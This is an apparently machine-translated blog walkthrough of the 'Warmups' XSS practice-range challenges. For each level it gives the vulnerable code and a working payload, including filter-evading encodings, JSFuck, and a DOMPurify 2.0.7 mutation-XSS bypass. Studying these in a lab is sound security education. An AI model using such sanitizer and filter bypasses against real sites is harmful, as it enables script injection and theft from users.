当前位置:网站首页>XSS online shooting range---Warmups
XSS online shooting range---Warmups
2022-08-03 21:12:00 【hug kitten】
目录
线上靶场网址
Ma Spaghet!
关键代码分析:
spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
1、URLSearchParams接口定义了一些实用的方法来处理URL的查询字符串.
URLSearchParams()Is an object that can manipulate query strings.
常用方法: 1、构造查询字符串 2、获取查询字符串参数
2、innerHTML:它是一个字符串,用来设置或获取位于对象起始和结束标签内的HTML.相当于获取HTML当前标签的起始和结束里面的内容.
使用get方法传递URL,There is no other way to filter,我们尝试使用<script>alert(1)</script>绕过一下
没有弹窗,Let's find out why?
Because is because<script>语句是由innerHTMLThe label was uploaded,我们先查看innerHTML的作用: 在HTML5specified in does not executeinnerHTML中插入的<script>标签
所以换成<img src=1 οnerrοr=alert(1337)>再试试,成功了
Jefff
关键代码分析:
eval(`ma = "Ma name ${jeff}"`)
setTimeout(_ => {
maname.innerText = ma
}, 1000)
1、Pass using template stringjefff
2、setTimeout:Call a function or execute a code fragment after a specified delay time
3、innerText:Used to define the text to be output by the object.
First we try directlyalert(1)Pass it in and try it
没有成功,A combination of the above methods:eval(`ma = "Ma name ${alert(1337)}"`),Let's analyze this statement
evalAlthough only the first parameter is accepted,But the second parameter is executed first,Although the second parameter can be executed,But will not accept
The result of the execution of the second parameter.
We first have to enclose double quotes to executealert,It takes the string inside the double quotes as the first parameter,alert(1337)Executed as the second parameter
最后组合成:eval(`ma = "Ma name ${aa";alert(1337)//}"`) ,成功了
Ugandan Knuckles
关键代码分析:
<script>
let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
wey = wey.replace(/[<>]/g, '')
uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>
1、replace:使用其他文本字符串并根据所指定的字符数替换某文本字符串中的部分文本,Equivalent to will in the title/[<>]Equal symbols are replaced with empty
2、placeholder:该提示会在输入字段为空时显示,并会在字段获得焦点时消失.
Because the angle brackets are escaped,So we first try to use encoding to bypass the angle brackets.
在编码前,我们要确定首先进行HTML实体编码,在进行urlencode编码.原因:Because the string we entered is in URL栏里面,So we have to proceedurlencode编码,但是urlencodeencoding will be inURLcolumn is parsed,The parsed content is then passed inHTML中,We need to make sure to get inHTMLBefore angle brackets will not be parsed it needs to be done firstHTML实体编码,再urlencode编码,这样我们的The parsing order is firsturlencode解析,再HTML实体编码解析
我们填入的是1"><img src=1 οnerrοr=alert(1337)>,因为HTML自动纠错的功能,我们只需要编码1">< 即可,At this point we enter the content of :%26%2349%3B%26%2334%3B%26%2362%3B%26%2360%3Bimg src=1 οnerrοr=alert(1337)
没有成功,Let's take a look at the web page source code
As you can see from the source code we have bypassed the angle brackets,但是imgThere are no escaped double quotes.After many attempts also did not bypass the double quotes,So we have to go the other way around.
From the title, we can see that the data we input is in<input>标签里面,我们借用onfocus和autofocus进行绕过
1、onfocus:Gain focus on the object(光标)时发生
2、autofocus:自动聚焦
So our input data is:1" οnfοcus="alert(1337)" autofocus=" ,成功了
View the source code is:
Ricardo Milos
关键代码分析:
<form id="ricardo" method="GET">
<input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
setTimeout(_ => {
ricardo.submit()
}, 2000)
</script>
1、action:提交行为,actionThe attribute is used to specify when the form is submitted,向何处发送表单数据,This method is not limited,可以直接使用javascript提交alert(1337)
2、submit:相当于提交按钮
We submit directly:javascript:alert(1337)
需要注意的是,里面有setTimeout函数,So there will be a delay of two seconds before the window pops up
Ah That's Hawt
关键代码分析:
<h2 id="will"></h2>
<script>
smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
smith = smith.replace(/[\(\`\)\\]/g, '')
will.innerHTML = smith
</script>
1、使用replace过滤了/[\(\`\)\\]
We use encoding for bypass testing,()Entity encoding is done firsturlencode编码:%26%2340%3B%26%2341%3B
<img src=1 οnerrοr=alert%26%2340%3B1337%26%2341%3B>
成功了,Then we can also try other bypass functions
<a href=javascript:alert%26%2340%3B1337%26%2341%3B>aaa</a>,需要点击aaaInteract to execute the popup function
<a 标签中可以使用%2528和%2529,URLmodules can be recognizedJavaScript协议进行URL解码
<a href=javascript:alert%25281337%2529>aaa</a>
Ligma
关键代码分析:
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)
将[A-Za-z0-9]都进行了过滤,We cannot use letters nor numbers,At this time we can use another special encoding method:JSFuck - Write any JavaScript with 6 Characters: []()!+
First on this page will bealert(1337)编码
Then take this encoding result to carry outurlencodeIt can only be put in after encodingURLexecute in the column
Mafia
关键代码分析:
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)
1、slice:可提取字符串的某个部分,并以新的字符串返回被提取的部分.
2、过滤了:[\`\'\"\+\-\!\\\[\]]和alert字符串
所以我们得将alter改变一下,所以我们使用parseInt函数(Converts a string to a string of numbers,并且使用..toString()可以转回来)
我们使用eval提交数据:我们提交(8680439..toString(30))(1337)会变成eval((8680439..toString(30))(1337)),所以We submit directlyeval(8680439..toString(30))(1337)
成功弹窗
location.hash.slice(1):把#The first digit after the number is taken out,我们可以在#Pass the value lateralert(1),这样就把alert(1)提取出来了,然后使用eval执行
eval(location.hash.slice(1))#alert(1337)
Function 构造函数,Delimiters should be added between sentences
ALERT(1337):传递的参数
.source.toLowerCase():将ALERT转成小写
Function(/ALERT(1337)/.source.toLowerCase())()
Ok, Boomer
关键代码分析:
<h2 id="boomer">Ok, Boomer.</h2>
<script>
boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
setTimeout(ok, 2000)
</script>
DOMPurify:DOMPurify是一个开源的基于DOM的快速XSS净化工具.输入HTML元素,然后通过DOM解析递归元素节点,进行净化,输出安全的HTML.
We can try to bypass this frame,But you have to understand the framework first:
Find the version of this framework(查看源码)--> The framework used for this is DOMPurify2.0.7
第一种方法:Mutations are obfuscated by namespaceXSS绕过DOMPurify
操作流程:解析、Loop to remove dangerous functions、还原成HTML代码、序列化、解析(Possibly after multiple parsingDOM树不一样)
html规范中,不允许form元素的子元素是form.Then explain nestingformelements are not allowed.This results in nesting inside form元素被html解析器忽略,就是第二个form会自动消失.We can however pass slightly broken markup with incorrectly nested tags,Nested forms can be created.通过div将第二个formnested in
例子:<form id="outer"><div></form><form id="inner"><input>
This is not a bug in any particular browser;它直接来自HTML规范,and parsingHTMLis described in the algorithm.
1、当你打开一个<form>标签时,The parser needs to be opened using the form element pointer(This is how it is called in the specification).If the pointer is notnull,则form无法创建元素.
2、结束<form>标记时,The form element pointer is always set to null.
一开始,The form element pointer points toid="outer".然后,出现一个div,</form>Set the form element pointer tonull.因为是null,所以id="inner"The next form can be created;And because we are currentlydiv中,所以有一个form嵌套在form里.
现在,If we try to serialize the generated DOM树,We will get the following markup:
<form id="outer"><div><form id="inner"><input></form></div></form>
So this proves that parsing again after serialization is not guaranteed to return the originalDOM树.
默认情况下,所有元素都在HTML命名空间中;但是,If the parser encounters <svg> or <math>元素,then it separately"切换"到SVG和MathML命名空间.And both namespaces produce external content.
in external content,Tags are parsed in the same way as normalHTML不同.This can be parsed<style>elements are clearly displayed.在HTML命名空间中,<style>只能包含文本;没有后代,and does not decodeHTML实体.This is not the case with external content:外部内容<style>可以有子元素,and the entity is decoded.
例子:<style><a>ABC</style><svg><style><a>ABC
在不同的情况下<style>的作用不同:html style只有文本内容,而svg styleare parsed like normal elements.
猜想:If we are located<svg>或者<math>中,then all elements will also be in nonHTML命名空间中,然而事实并非如此.HTMLIncluded in the standard is the nameMathML text integration point (MathMLText Integration Point)以及HTML integration point (HTML集成点)的元素,The child elements of these elements all have HTML命名空间.
注意style作为mathThe direct child elements of MathML命名空间中,而第二个style在mtext下则是 HTML命名空间中.这是因为 mtext是MathMLA literal integration point makes the parser switch namespaces.
<mtext>:MathML <mtext>Elements are used to render arbitrary text without symbolic meaning,such as comments or annotations.
Just encounter a text cluster point,Namespaces can be switched automatically.
PS:Not all text cluster points switch namespaces.html规范中,大部分MathmlThe child elements of the text integration point are allHTMLNamespace ah,但是除了<mglyph><malignmark>.When the two are directlyMathmlWhen text is a direct child of the integration point.They don't switch namespaces.
<form><math><mtext><form><mg1yph><sty1e></math><img src οnerrοr=alert(1)></style></mg1yph></form></mtext></math></form>
So now the second onehtml form没有被创建,mglyph现在是mtext的直接子元素,在MathML命名空间中.因此,style它也在MathM命名空间中,Therefore its content is not considered text.然后</math>关闭<math>元素,现在img在HTML命名空间中创建,导致XSS
所以我们使用:<form><math><mtext></form><form><mglyph><style></math><img src οnerrοr=alert(1337)> 绕过
第二种方法:DOM clobbering
Grab an element,设置一个监听器,A popup will appear when you click it,使用window.id (id为名称),This will grab the code for that name directly,通过DOMCover something to achieve the means of attack.
<a id="ok" href="tel:alert(1)">aaa</a>
我们还可以使用:<a id="ok" href="cid:alert(1337)">aaa</a>
边栏推荐
- AWTK开发编译环境踩坑记录1(编译提示powershell.exe出错)
- Transformer怎么入门?如何学习Transformer?
- Zero trust, which has been popular for more than ten years, why can't it be implemented?
- leetcode 268. Missing Numbers (XOR!!)
- ES6 introduction and let, var, const
- Advantages and Disadvantages of Blind and Buried Via PCB Stacked Via Design
- XSS online shooting range---prompt
- LeetCode_位数统计_中等_400.第 N 位数字
- 【kali-漏洞利用】(3.2)Metasploit基础(上):基础知识
- 4. 模块化编程
猜你喜欢
随机推荐
ES6 - Arrow Functions
解决This application failed to start because no Qt platform plugin could be initialized的办法
2022年1~7月语音合成(TTS)和语音识别(ASR)论文月报
4. Modular programming
有趣的opencv-记录图片二值化和相似度实现
6. XML
E - Swap
【使用 Pytorch 实现入门级的人工神经网络】
编译器工程师眼中的好代码(1):Loop Interchange
tkwebview2创作心得
《富爸爸,穷爸爸》思维导图和学习笔记
svg+js订单确认按钮动画js特效
4. 模块化编程
3种圆形按钮悬浮和点击事件
Leetcode 16. Numerical integral power (power + fast recursive/iteration)
Several difficult problems in DDD
从开发到软件测试:除了扎实的测试基础,还有哪些必须掌握 ?
XSS测试
AWTK开发编译环境踩坑记录1(编译提示powershell.exe出错)
Android build error: Plugin with id ‘kotlin-android‘ not found.